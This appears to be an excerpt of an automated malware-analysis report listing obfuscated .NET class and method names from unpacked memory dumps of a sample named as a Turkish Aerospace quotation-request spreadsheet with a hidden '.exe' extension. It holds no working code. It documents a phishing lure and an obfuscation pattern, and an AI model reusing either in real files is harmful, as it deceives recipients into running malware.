                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, w90A1jnMoPf4Br66m9.csHigh entropy of concatenated method names: 'akjOZ8JEdN', 'i8fOLCtmSK', 'bmuO2uX4Ac', 'gJ52oNpuBj', 'S9T2z9HWtZ', 'uCqOlYakR3', 'roWOpJnnt4', 'S7BO579Se9', 'cI5OAMwHcY', 'GDFOsnv25Y'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, kJCm3784MdIr1AhtcP.csHigh entropy of concatenated method names: 'G2W1c740n3', 'O3W1aJlKYj', 't3d18yya1r', 'MtI1NC6O1O', 'O1v1mS75We', 'tR01eltXtb', 'XHL1Jkwqu0', 'xNH1tZp5PT', 'zer1TXwIZv', 'er51nCTVV2'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, ua2Hibx6ZJxZHLkI9Q.csHigh entropy of concatenated method names: 'ukwM4yHtXq', 'VgVMow7fbV', 'p48QlRXELa', 'lbxQp67g6E', 'ixAMEFs6jL', 'RGXMapE1pw', 'LHWM3sarus', 'GOsM8RR4Qa', 'rnlMNPfsBA', 'cCXMvbhd0K'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, Ygu3V0U7WENZpiB0Rh.csHigh entropy of concatenated method names: 'ySC2WsowAC', 'sv72ijQ4UK', 'eGw26iHp2Z', 'Ypf2OjGADx', 'eNo2RBphWP', 'OAY6rUpdZG', 'Eti6xFxQUJ', 'Gxl6Pqc8ii', 'X1p64IBIiN', 'NFC6fYdHgu'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, kkyuEWbsq1ZCQwxdXQ.csHigh entropy of concatenated method names: 'zc7i8Zj4b6', 'J9jiN6plHO', 'O7uivxlZUT', 'HF1iIqYIfH', 'AQ7irTOqon', 'O7pixwbwwj', 'O16iPqHe0Q', 'dWdi4wDe2E', 'm8lifZKbk2', 'xNjioFLKnM'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, aqyGOlBN8CM3jEJht0.csHigh entropy of concatenated method names: 'C1ZO06crM9', 'hJJOKy1ofn', 'NP5OgRhY8W', 'qXUOdgHUpH', 'X3AOYtaNYZ', 'SDOOSfbL5W', 'oZpO7d0KUZ', 'r91ObT03r6', 'PjVO9qS0fp', 'jE9OquDVuU'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, HMrRYozAd8caEdwjOH.csHigh entropy of concatenated method names: 'WvrjSreHnb', 'i7Ajb2r2lg', 'We2j9ZEbFP', 'rVHjUy3Ub6', 'nq4jmyiUp2', 'l4pjJXtA14', 'CaWjte75G4', 'crmjhs7Jwp', 'SUDj0x7yQZ', 'UgajKDqSCy'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, n3gWy0IkhZMqDGVwnx.csHigh entropy of concatenated method names: 'vZGMX9qPSP', 'RY7MCA1msi', 'ToString', 'I44MZZ3h44', 'SbSMi9MXS6', 'qp0MLC07TA', 'HXDM6rICkj', 'a8tM2Sn9Mj', 'j7QMOOdDXj', 'c5JMRN8yRt'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, y0d6quslK3NXUumYtW.csHigh entropy of concatenated method names: 'TZRpOkyuEW', 'dq1pRZCQwx', 'M2opXZfnX2', 'tKmpC2BciG', 'ry2p1v9ogu', 'QV0pF7WENZ', 'vdPcvCPNtSEk4NdTsN', 'jGwOYOKbQ04d0RXYdM', 'No9ppakQ4O', 'PVSpAlZNRk'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, UE0SrmplFAtSaQ8Im96.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Y25jElbAGt', 'dXTjadMZq3', 'UYlj30vMIO', 'wETj8u5aD7', 'uMTjNyLJey', 'qbpjvkC6DO', 't8TjIAUrlm'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, SmAv1s3xG5ELJWCDwm.csHigh entropy of concatenated method names: 'oLJkbnXnEn', 'Okek9gavU2', 'fEEkUot656', 'D1MkmVcBnf', 'cA1kJ1Stss', 'TD0ktTZEEE', 'hFOknyDknn', 'GX6kw33NMO', 'JOvkcuG767', 'h4bkEQDMOi'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, MciGssqEFELlbQy2v9.csHigh entropy of concatenated method names: 'ipM6YWn7eh', 'ai3676Ti5d', 'djdLeVH5kx', 'wHpLJ1xKlC', 'cDGLt26Fjg', 'CSZLTskR5t', 'wusLn2968j', 'xkSLwFT82X', 'Yt7LBi5Pru', 'splLcw5ZPO'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, f9q9we5WEOkHCUbSS8.csHigh entropy of concatenated method names: 'etjg9dcBN', 'h2rdPnaEf', 'emYSDtjcX', 'GTZ7OBMwQ', 'BPv9tjrTf', 'Oh8qGdJor', 'fDHZWfiXMZuLhjEBy8', 'kSBwj0fHdCtIHLAdvi', 'peoQAmwKi', 'xYDj9cvQI'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, G8jNSB92oZfnX2HKm2.csHigh entropy of concatenated method names: 'v8xLdJDgZn', 'zVXLSQ5tIb', 'sRPLb34E7J', 'tm5L9jxnjh', 'O88L1IjPvi', 'pDMLFoJHcG', 'geeLMsMl3I', 'fT8LQcAONT', 't1BLuwr7LN', 'WGDLj6jKkS'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, soPyQMTbL8lM5TQHkR.csHigh entropy of concatenated method names: 'rkv2voGWH9', 'aaE2IHA3TQ', 'ghS2rH91eS', 'ToString', 'HLN2xdjW6Q', 'PRy2PJv09I', 'NbeqTKhmJVkFD3wWD1h', 'WROJPnh2dZkVxSyaxuB', 'udoCFEh6bC4pbjQGORM'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, NMrfmOvdAmj7dFUB9s.csHigh entropy of concatenated method names: 'ToString', 'eiZFEss2Fs', 'uB6FmutTEE', 'EJoFebJiAc', 'P9iFJFByCl', 'fcDFtxbdmm', 'EK7FTtjtGg', 'ti4FnFXqMm', 'kpJFwleopV', 'skGFBBqkM6'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, T2jEttffFsbbJVuRWm.csHigh entropy of concatenated method names: 'LQtuU4ypSE', 'UioumWwjst', 'YDgueUbc4H', 'mvwuJHfFVw', 's7Wut9AdMd', 'o4CuTsVduI', 'K9uungejcl', 'HT1uwUOSpS', 'TdHuBNPMnG', 'Ktoucj3q2w'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, LfUsopiDSj17gx4YBa.csHigh entropy of concatenated method names: 'Dispose', 'mV0pfetVwL', 'fP05m30fUQ', 'yZeYHft58s', 'ELJpoSmffB', 'B0JpzRsTbA', 'ProcessDialogKey', 'OlI5l2jEtt', 'XFs5pbbJVu', 'kWm55JaNmi'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, LxU94UppiMQcmvaDIT2.csHigh entropy of concatenated method names: 'rNcjoflIKs', 'UtBjznx90p', 'PQTHlYoFpa', 'EmTHpc9rQa', 'Sq0H5RYrGH', 'ctHHALnmY2', 'yJ7HsABjXn', 'P3WHWI1OZf', 'fRQHZD9AcZ', 'D88HiP9hqa'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, XSC45GRfM1SSKcDUtG.csHigh entropy of concatenated method names: 'S7dAWRW0as', 'SfyAZPdgjk', 'KtfAiUVQEH', 'AxrALKviK9', 'Du4A6NOEPT', 'KqnA2y3t0x', 'IaxAOCgR7X', 'a8KARfd0sS', 'ejDAGBFNKX', 's6RAXlAHKJ'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, O08or7psCSBfFZSdPeL.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OnlVuFopnb', 'uhXVjORM2x', 'xLLVHLaOgE', 'zusVVCnq6N', 'JEbVyeTLD3', 'iUNVDG1u2A', 'VasVhCwWq5'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, iCcs8YPAkCV0etVwL9.csHigh entropy of concatenated method names: 'u9Eu1uSUKS', 'X3HuMrkaVY', 'icNuufihhU', 'arluHY9ghP', 'cIduySfnxL', 'l65uhWNKbL', 'Dispose', 'BAYQZ1t4MJ', 'BbWQiYfbuN', 'XFxQLDy4ny'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, w90A1jnMoPf4Br66m9.csHigh entropy of concatenated method names: 'akjOZ8JEdN', 'i8fOLCtmSK', 'bmuO2uX4Ac', 'gJ52oNpuBj', 'S9T2z9HWtZ', 'uCqOlYakR3', 'roWOpJnnt4', 'S7BO579Se9', 'cI5OAMwHcY', 'GDFOsnv25Y'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, kJCm3784MdIr1AhtcP.csHigh entropy of concatenated method names: 'G2W1c740n3', 'O3W1aJlKYj', 't3d18yya1r', 'MtI1NC6O1O', 'O1v1mS75We', 'tR01eltXtb', 'XHL1Jkwqu0', 'xNH1tZp5PT', 'zer1TXwIZv', 'er51nCTVV2'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, ua2Hibx6ZJxZHLkI9Q.csHigh entropy of concatenated method names: 'ukwM4yHtXq', 'VgVMow7fbV', 'p48QlRXELa', 'lbxQp67g6E', 'ixAMEFs6jL', 'RGXMapE1pw', 'LHWM3sarus', 'GOsM8RR4Qa', 'rnlMNPfsBA', 'cCXMvbhd0K'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, Ygu3V0U7WENZpiB0Rh.csHigh entropy of concatenated method names: 'ySC2WsowAC', 'sv72ijQ4UK', 'eGw26iHp2Z', 'Ypf2OjGADx', 'eNo2RBphWP', 'OAY6rUpdZG', 'Eti6xFxQUJ', 'Gxl6Pqc8ii', 'X1p64IBIiN', 'NFC6fYdHgu'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, kkyuEWbsq1ZCQwxdXQ.csHigh entropy of concatenated method names: 'zc7i8Zj4b6', 'J9jiN6plHO', 'O7uivxlZUT', 'HF1iIqYIfH', 'AQ7irTOqon', 'O7pixwbwwj', 'O16iPqHe0Q', 'dWdi4wDe2E', 'm8lifZKbk2', 'xNjioFLKnM'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, aqyGOlBN8CM3jEJht0.csHigh entropy of concatenated method names: 'C1ZO06crM9', 'hJJOKy1ofn', 'NP5OgRhY8W', 'qXUOdgHUpH', 'X3AOYtaNYZ', 'SDOOSfbL5W', 'oZpO7d0KUZ', 'r91ObT03r6', 'PjVO9qS0fp', 'jE9OquDVuU'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, HMrRYozAd8caEdwjOH.csHigh entropy of concatenated method names: 'WvrjSreHnb', 'i7Ajb2r2lg', 'We2j9ZEbFP', 'rVHjUy3Ub6', 'nq4jmyiUp2', 'l4pjJXtA14', 'CaWjte75G4', 'crmjhs7Jwp', 'SUDj0x7yQZ', 'UgajKDqSCy'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, n3gWy0IkhZMqDGVwnx.csHigh entropy of concatenated method names: 'vZGMX9qPSP', 'RY7MCA1msi', 'ToString', 'I44MZZ3h44', 'SbSMi9MXS6', 'qp0MLC07TA', 'HXDM6rICkj', 'a8tM2Sn9Mj', 'j7QMOOdDXj', 'c5JMRN8yRt'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, y0d6quslK3NXUumYtW.csHigh entropy of concatenated method names: 'TZRpOkyuEW', 'dq1pRZCQwx', 'M2opXZfnX2', 'tKmpC2BciG', 'ry2p1v9ogu', 'QV0pF7WENZ', 'vdPcvCPNtSEk4NdTsN', 'jGwOYOKbQ04d0RXYdM', 'No9ppakQ4O', 'PVSpAlZNRk'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, UE0SrmplFAtSaQ8Im96.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Y25jElbAGt', 'dXTjadMZq3', 'UYlj30vMIO', 'wETj8u5aD7', 'uMTjNyLJey', 'qbpjvkC6DO', 't8TjIAUrlm'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, SmAv1s3xG5ELJWCDwm.csHigh entropy of concatenated method names: 'oLJkbnXnEn', 'Okek9gavU2', 'fEEkUot656', 'D1MkmVcBnf', 'cA1kJ1Stss', 'TD0ktTZEEE', 'hFOknyDknn', 'GX6kw33NMO', 'JOvkcuG767', 'h4bkEQDMOi'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, MciGssqEFELlbQy2v9.csHigh entropy of concatenated method names: 'ipM6YWn7eh', 'ai3676Ti5d', 'djdLeVH5kx', 'wHpLJ1xKlC', 'cDGLt26Fjg', 'CSZLTskR5t', 'wusLn2968j', 'xkSLwFT82X', 'Yt7LBi5Pru', 'splLcw5ZPO'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, f9q9we5WEOkHCUbSS8.csHigh entropy of concatenated method names: 'etjg9dcBN', 'h2rdPnaEf', 'emYSDtjcX', 'GTZ7OBMwQ', 'BPv9tjrTf', 'Oh8qGdJor', 'fDHZWfiXMZuLhjEBy8', 'kSBwj0fHdCtIHLAdvi', 'peoQAmwKi', 'xYDj9cvQI'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, G8jNSB92oZfnX2HKm2.csHigh entropy of concatenated method names: 'v8xLdJDgZn', 'zVXLSQ5tIb', 'sRPLb34E7J', 'tm5L9jxnjh', 'O88L1IjPvi', 'pDMLFoJHcG', 'geeLMsMl3I', 'fT8LQcAONT', 't1BLuwr7LN', 'WGDLj6jKkS'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, soPyQMTbL8lM5TQHkR.csHigh entropy of concatenated method names: 'rkv2voGWH9', 'aaE2IHA3TQ', 'ghS2rH91eS', 'ToString', 'HLN2xdjW6Q', 'PRy2PJv09I', 'NbeqTKhmJVkFD3wWD1h', 'WROJPnh2dZkVxSyaxuB', 'udoCFEh6bC4pbjQGORM'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, NMrfmOvdAmj7dFUB9s.csHigh entropy of concatenated method names: 'ToString', 'eiZFEss2Fs', 'uB6FmutTEE', 'EJoFebJiAc', 'P9iFJFByCl', 'fcDFtxbdmm', 'EK7FTtjtGg', 'ti4FnFXqMm', 'kpJFwleopV', 'skGFBBqkM6'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, T2jEttffFsbbJVuRWm.csHigh entropy of concatenated method names: 'LQtuU4ypSE', 'UioumWwjst', 'YDgueUbc4H', 'mvwuJHfFVw', 's7Wut9AdMd', 'o4CuTsVduI', 'K9uungejcl', 'HT1uwUOSpS', 'TdHuBNPMnG', 'Ktoucj3q2w'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, LfUsopiDSj17gx4YBa.csHigh entropy of concatenated method names: 'Dispose', 'mV0pfetVwL', 'fP05m30fUQ', 'yZeYHft58s', 'ELJpoSmffB', 'B0JpzRsTbA', 'ProcessDialogKey', 'OlI5l2jEtt', 'XFs5pbbJVu', 'kWm55JaNmi'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, LxU94UppiMQcmvaDIT2.csHigh entropy of concatenated method names: 'rNcjoflIKs', 'UtBjznx90p', 'PQTHlYoFpa', 'EmTHpc9rQa', 'Sq0H5RYrGH', 'ctHHALnmY2', 'yJ7HsABjXn', 'P3WHWI1OZf', 'fRQHZD9AcZ', 'D88HiP9hqa'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, XSC45GRfM1SSKcDUtG.csHigh entropy of concatenated method names: 'S7dAWRW0as', 'SfyAZPdgjk', 'KtfAiUVQEH', 'AxrALKviK9', 'Du4A6NOEPT', 'KqnA2y3t0x', 'IaxAOCgR7X', 'a8KARfd0sS', 'ejDAGBFNKX', 's6RAXlAHKJ'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, O08or7psCSBfFZSdPeL.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OnlVuFopnb', 'uhXVjORM2x', 'xLLVHLaOgE', 'zusVVCnq6N', 'JEbVyeTLD3', 'iUNVDG1u2A', 'VasVhCwWq5'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, iCcs8YPAkCV0etVwL9.csHigh entropy of concatenated method names: 'u9Eu1uSUKS', 'X3HuMrkaVY', 'icNuufihhU', 'arluHY9ghP', 'cIduySfnxL', 'l65uhWNKbL', 'Dispose', 'BAYQZ1t4MJ', 'BbWQiYfbuN', 'XFxQLDy4ny'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, w90A1jnMoPf4Br66m9.csHigh entropy of concatenated method names: 'akjOZ8JEdN', 'i8fOLCtmSK', 'bmuO2uX4Ac', 'gJ52oNpuBj', 'S9T2z9HWtZ', 'uCqOlYakR3', 'roWOpJnnt4', 'S7BO579Se9', 'cI5OAMwHcY', 'GDFOsnv25Y'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, kJCm3784MdIr1AhtcP.csHigh entropy of concatenated method names: 'G2W1c740n3', 'O3W1aJlKYj', 't3d18yya1r', 'MtI1NC6O1O', 'O1v1mS75We', 'tR01eltXtb', 'XHL1Jkwqu0', 'xNH1tZp5PT', 'zer1TXwIZv', 'er51nCTVV2'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, ua2Hibx6ZJxZHLkI9Q.csHigh entropy of concatenated method names: 'ukwM4yHtXq', 'VgVMow7fbV', 'p48QlRXELa', 'lbxQp67g6E', 'ixAMEFs6jL', 'RGXMapE1pw', 'LHWM3sarus', 'GOsM8RR4Qa', 'rnlMNPfsBA', 'cCXMvbhd0K'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, Ygu3V0U7WENZpiB0Rh.csHigh entropy of concatenated method names: 'ySC2WsowAC', 'sv72ijQ4UK', 'eGw26iHp2Z', 'Ypf2OjGADx', 'eNo2RBphWP', 'OAY6rUpdZG', 'Eti6xFxQUJ', 'Gxl6Pqc8ii', 'X1p64IBIiN', 'NFC6fYdHgu'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, kkyuEWbsq1ZCQwxdXQ.csHigh entropy of concatenated method names: 'zc7i8Zj4b6', 'J9jiN6plHO', 'O7uivxlZUT', 'HF1iIqYIfH', 'AQ7irTOqon', 'O7pixwbwwj', 'O16iPqHe0Q', 'dWdi4wDe2E', 'm8lifZKbk2', 'xNjioFLKnM'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, aqyGOlBN8CM3jEJht0.csHigh entropy of concatenated method names: 'C1ZO06crM9', 'hJJOKy1ofn', 'NP5OgRhY8W', 'qXUOdgHUpH', 'X3AOYtaNYZ', 'SDOOSfbL5W', 'oZpO7d0KUZ', 'r91ObT03r6', 'PjVO9qS0fp', 'jE9OquDVuU'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, HMrRYozAd8caEdwjOH.csHigh entropy of concatenated method names: 'WvrjSreHnb', 'i7Ajb2r2lg', 'We2j9ZEbFP', 'rVHjUy3Ub6', 'nq4jmyiUp2', 'l4pjJXtA14', 'CaWjte75G4', 'crmjhs7Jwp', 'SUDj0x7yQZ', 'UgajKDqSCy'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, n3gWy0IkhZMqDGVwnx.csHigh entropy of concatenated method names: 'vZGMX9qPSP', 'RY7MCA1msi', 'ToString', 'I44MZZ3h44', 'SbSMi9MXS6', 'qp0MLC07TA', 'HXDM6rICkj', 'a8tM2Sn9Mj', 'j7QMOOdDXj', 'c5JMRN8yRt'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, y0d6quslK3NXUumYtW.csHigh entropy of concatenated method names: 'TZRpOkyuEW', 'dq1pRZCQwx', 'M2opXZfnX2', 'tKmpC2BciG', 'ry2p1v9ogu', 'QV0pF7WENZ', 'vdPcvCPNtSEk4NdTsN', 'jGwOYOKbQ04d0RXYdM', 'No9ppakQ4O', 'PVSpAlZNRk'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, UE0SrmplFAtSaQ8Im96.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Y25jElbAGt', 'dXTjadMZq3', 'UYlj30vMIO', 'wETj8u5aD7', 'uMTjNyLJey', 'qbpjvkC6DO', 't8TjIAUrlm'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, SmAv1s3xG5ELJWCDwm.csHigh entropy of concatenated method names: 'oLJkbnXnEn', 'Okek9gavU2', 'fEEkUot656', 'D1MkmVcBnf', 'cA1kJ1Stss', 'TD0ktTZEEE', 'hFOknyDknn', 'GX6kw33NMO', 'JOvkcuG767', 'h4bkEQDMOi'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, MciGssqEFELlbQy2v9.csHigh entropy of concatenated method names: 'ipM6YWn7eh', 'ai3676Ti5d', 'djdLeVH5kx', 'wHpLJ1xKlC', 'cDGLt26Fjg', 'CSZLTskR5t', 'wusLn2968j', 'xkSLwFT82X', 'Yt7LBi5Pru', 'splLcw5ZPO'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, f9q9we5WEOkHCUbSS8.csHigh entropy of concatenated method names: 'etjg9dcBN', 'h2rdPnaEf', 'emYSDtjcX', 'GTZ7OBMwQ', 'BPv9tjrTf', 'Oh8qGdJor', 'fDHZWfiXMZuLhjEBy8', 'kSBwj0fHdCtIHLAdvi', 'peoQAmwKi', 'xYDj9cvQI'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, G8jNSB92oZfnX2HKm2.csHigh entropy of concatenated method names: 'v8xLdJDgZn', 'zVXLSQ5tIb', 'sRPLb34E7J', 'tm5L9jxnjh', 'O88L1IjPvi', 'pDMLFoJHcG', 'geeLMsMl3I', 'fT8LQcAONT', 't1BLuwr7LN', 'WGDLj6jKkS'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, soPyQMTbL8lM5TQHkR.csHigh entropy of concatenated method names: 'rkv2voGWH9', 'aaE2IHA3TQ', 'ghS2rH91eS', 'ToString', 'HLN2xdjW6Q', 'PRy2PJv09I', 'NbeqTKhmJVkFD3wWD1h', 'WROJPnh2dZkVxSyaxuB', 'udoCFEh6bC4pbjQGORM'
